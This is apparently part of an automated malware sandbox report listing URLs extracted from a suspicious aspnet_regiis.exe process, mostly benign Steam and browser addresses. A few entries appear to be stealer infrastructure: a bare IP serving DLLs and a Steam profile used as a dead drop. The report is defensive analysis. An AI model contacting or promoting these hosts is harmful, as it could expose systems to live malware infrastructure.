                                                                                              http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sfile.exefalse
                                                                                                		unknown
                                                                                                https://sketchfab.comaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://lv.queniujq.cnaspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brHDGCFH.3.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://www.youtube.com/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                      		unknown
                                                                                                      https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.3.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drfalse
                                                                                                        		unknown
                                                                                                        https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://www.google.com/recaptcha/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://49.12.197.9/mozglue.dll(aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://checkout.steampowered.com/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgaspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drfalse
                                                                                                                		unknown
                                                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiDBFIEH.3.drfalse
                                                                                                                  		unknown
                                                                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://steamcommunity.com/profiles/76561199780418869xaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://store.steampowered.com/;aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://49.12.197.9/vcruntime140.dllqaspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://store.steampowered.com/about/76561199780418869[1].htm.3.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                        		unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://ocsp.sectigo.com0file.exefalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://help.steampowered.com/en/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://steamcommunity.com/market/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                            		unknown
                                                                                                                            https://store.steampowered.com/news/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://community.akamai.steamstatic.com/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                              		unknown
                                                                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drfalse
                                                                                                                                		unknown
                                                                                                                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#file.exefalse
                                                                                                                                  		unknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://recaptcha.net/recaptcha/;aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enaspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
